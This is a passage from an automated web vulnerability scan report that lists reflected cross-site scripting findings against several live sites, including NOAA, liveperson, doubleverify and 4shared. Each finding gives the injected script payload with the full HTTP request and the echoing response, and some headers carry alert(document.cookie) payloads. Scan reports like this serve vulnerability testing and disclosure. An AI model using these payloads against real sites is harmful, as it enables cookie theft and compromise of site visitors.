Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 28 Feb 2011 02:15:01 GMT
Cache-Control: max-age=172800
Server: Apache
Vary: Accept-Encoding
X-Cached-Time: Sat, 26 Feb 2011 02:15:01 GMT
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7), 1.0 c3.w3.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>National Weather Service radar from Portland, ME</title>
<meta nam
...[SNIP]...
<a class="navbar" href="radar.php?rid=gyx&overlays=11101111&product=N0R3b52b\" a=b b5abd972cb4&loop=no" title="Go to the Enhanced Version">
...[SNIP]...

3.304. http://recreationalequipmen.tt.omtrdc.net/m2/recreationalequipmen/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recreationalequipmen.tt.omtrdc.net
Path:   /m2/recreationalequipmen/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload a34c8<script>alert(1)</script>edbd78759d0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/recreationalequipmen/mbox/standard?mboxHost=www.rei.com&mboxSession=1298667914619-871377&mboxPC=1298667914619-871377.17&mboxPage=1298667927682-403800&screenHeight=1200&screenWidth=1920&browserWidth=1437&browserHeight=954&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=recs_hpCustPicksa34c8<script>alert(1)</script>edbd78759d0&mboxId=0&mboxTime=1298646327740&mboxURL=http%3A%2F%2Fwww.rei.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: recreationalequipmen.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.rei.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 212
Date: Fri, 25 Feb 2011 21:06:33 GMT
Server: Test & Target

mboxFactories.get('default').get('recs_hpCustPicksa34c8<script>alert(1)</script>edbd78759d0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1298667914619-871377.17");

3.305. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c3c1'%3balert(1)//3dbbc323ad9 was submitted in the ctp parameter. This input was echoed as 2c3c1';alert(1)//3dbbc323ad9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rrserver/p13n_generated.js?a=5387d7af823640a7&ts=1298696265845&cis=%7C72384&p=1a6ddbd&re=True&cts=http%3A%2F%2Fwww5.jcpenney.com%2Fjcp%2F&pt=%7Censemble_page.content1&s=60f3720e7c71e45edb02b68f7b004135cxMnVNoVza3oxMnVNoVza3W200B181A7FD6BCDF0818AD551CB2274291EC1105704&ctp=%7C0%3AcmOrigId%25253D1a6ddbd%252526cmTypeFlag%25253DRichRel%252526cmCatID%25253Dhomepage%25257C723842c3c1'%3balert(1)//3dbbc323ad9&pref=http%3A%2F%2Fwww4.jcpenney.com%2Fjcp%2FXGN.aspx%3Fn%3D4294953363%26catsel%3D4294953363--comforters%2B%2B%2Bbedspreads%26deptid%3D70750%26pcatid%3D70750%26catid%3D72384%26cattyp%3DSAL%26dep%3DBEDDING%26pcat%3DBEDDING%26cat%3DSale%26refpagename%3DDefault%25252Easpx%26refdeptid%3D%26refcatid%3D%26cmAMS_T%3DT1%26cmAMS_C%3DC3%26CmCatId%3Dhomepage&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://www5.jcpenney.com/jcp/X6E.aspx?GrpTyp=ENS&ItemID=1a6ddbd&deptid=70750&dep=BEDDING&catid=72384&pcat=BEDDING&cat=Sale&NOffset=0&CatSel=4294953363%7ccomforters+%2b+bedspreads&pcatid=70750&Ne=4294957900+5+877+1014+1031+1007+6+8+904+18+833&N=4294953363&SO=0&cattyp=SAL&Nao=0&PSO=0&CmCatId=homepage|72384
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=8f0d715c-e29a-4f38-9373-184b98130248

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 05:00:30 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b126.1298696430236.43015778%7C; Path=/
Set-Cookie: pvihc=b126.1298696430236.43015778%7C; Expires=Tue, 23-Feb-2021 05:00:30 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 13433

var rr_recs={placements:[{used:false,placementType:'ensemble_page.content1',html:'<div class="rrOuterBox"> <div class="rrStrategyMessage" style="zoom: 1">Customers who viewed 400TC WrinkleGuard Bed
...[SNIP]...
818AD551CB2274291EC1105704&pg=615&p=1649c84&ct=http%3A%2F%2Fwww5.jcpenney.com%2Fjcp%2FX6E.aspx%3FGrptyp%3DENS%26ItemId%3D1649c84%26cmOrigId%3D1a6ddbd%26cmTypeFlag%3DRichRel%26cmCatID%3Dhomepage%7C723842c3c1';alert(1)//3dbbc323ad9\'">
...[SNIP]...

3.306. http://response.restoration.noaa.gov/orr_search.php [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /orr_search.php

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 702bd<script>alert(1)</script>df4883bec6d was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /orr_search.php?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20for.702bd<script>alert(1)</script>df4883bec6d HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 13:46:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16536

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">

   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <meta name="generator" cont
...[SNIP]...
<strong>The page you requested was not found. Please use our search page to find what you were looking for.702bd<script>alert(1)</script>df4883bec6d</strong>
...[SNIP]...

3.307. http://response.restoration.noaa.gov/orr_search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://response.restoration.noaa.gov
Path:   /orr_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c06b<script>alert(1)</script>96a6c1f2475 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /orr_search.php?message=The%20page%20you%20requested%20was%20not%20found.%20Please%20use%20our%20search%20page%20to%20find%20what%20you%20were%20looking%20/3c06b<script>alert(1)</script>96a6c1f2475for. HTTP/1.1
Host: response.restoration.noaa.gov
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7bf40be4e7088c5b50a95bc456b809b0

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 13:46:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16546

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en">

   <head>
       <meta http-equiv="content-type" content="text/html;charset=ISO-8859-1">
       <meta name="generator" cont
...[SNIP]...
<strong>The page you requested was not found. Please use our search page to find what you were looking /3c06b<script>alert(1)</script>96a6c1f2475for.</strong>
...[SNIP]...

3.308. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb0.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5975d<script>alert(1)</script>8e27cf83e0e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5027088&plc=56548503&sid=953349&num=1&ver=4&dv_url=http%3A//www.komonews.com/&callback=__verify_callback_2587954816405975d<script>alert(1)</script>8e27cf83e0e HTTP/1.1
Host: rtb0.doubleverify.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Wed, 23 Feb 2011 21:37:10 GMT
Content-Length: 74

__verify_callback_2587954816405975d<script>alert(1)</script>8e27cf83e0e(2)

3.309. http://sales.liveperson.net/hc/72961245/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/72961245/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 258a6<img%20src%3da%20onerror%3dalert(1)>590cda225df was submitted in the msessionkey parameter. This input was echoed as 258a6<img src=a onerror=alert(1)>590cda225df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/72961245/?&visitor=16601209214853&msessionkey=2142634892255068160258a6<img%20src%3da%20onerror%3dalert(1)>590cda225df&siteContainer=STANDALONE&site=72961245&cmd=mTagKnockPage&lpCallId=835270103532-486549123190&protV=20&lpjson=1&id=9459381186&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-english%7ClpMTagConfig.db1%7Cms_header_nav_chat%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/en_US/buy/pageType.product/externalRefID.8D6DDFB5?WT.mc_id=ecomaircover_autocollage
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=2142634892255068160; HumanClickSiteContainerID_72961245=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 11:27:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=2142634892255068160258a6<img src=a onerror=alert(1)>590cda225df; path=/hc/72961245
Set-Cookie: HumanClickKEY=2142634892255068160258a6<img src=a onerror=alert(1)>590cda225df; path=/hc/72961245
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 11:27:37 GMT
Set-Cookie: HumanClickSiteContainerID_72961245=STANDALONE; path=/hc/72961245
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29954

lpConnLib.Process({"ResultSet": {"lpCallId":"835270103532-486549123190","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='72961245-VID'; lpMTagConfig.FPC_VID='16601209214853'; lpMTagConfig.FPC_SKEY_NAME='72961245-SKEY'; lpMTagConfig.FPC_SKEY='2142634892255068160258a6<img src=a onerror=alert(1)>590cda225df';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_72961245'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

3.310. http://search.4shared.com/css/common.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81082"-alert(1)-"fa1a66483cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css81082"-alert(1)-"fa1a66483cf/common.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css81082&quot;-alert(1)-&quot;fa1a66483cf/common.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:11 GMT
Content-Length: 36953


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css81082"-alert(1)-"fa1a66483cf/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.311. http://search.4shared.com/css/common.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2823d"-alert(1)-"5c1c5cba9a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.css2823d"-alert(1)-"5c1c5cba9a2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/common.css2823d&quot;-alert(1)-&quot;5c1c5cba9a2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:12 GMT
Content-Length: 36964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/common.css2823d"-alert(1)-"5c1c5cba9a2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.312. http://search.4shared.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bb8"-alert(1)-"0465f9b3ed8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css89bb8"-alert(1)-"0465f9b3ed8/main.css?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css89bb8&quot;-alert(1)-&quot;0465f9b3ed8/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:11:58 GMT
Content-Length: 36943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css89bb8"-alert(1)-"0465f9b3ed8/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.313. http://search.4shared.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860a4"-alert(1)-"28ebbe0199e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.css860a4"-alert(1)-"28ebbe0199e?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/main.css860a4&quot;-alert(1)-&quot;28ebbe0199e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:12:10 GMT
Content-Length: 36944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/main.css860a4"-alert(1)-"28ebbe0199e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.314. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3880"-alert(1)-"5bdfa9fe7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /cssa3880&quot;-alert(1)-&quot;5bdfa9fe7b5/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:04 GMT
Content-Length: 37008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

3.315. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f80"-alert(1)-"11bae875e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
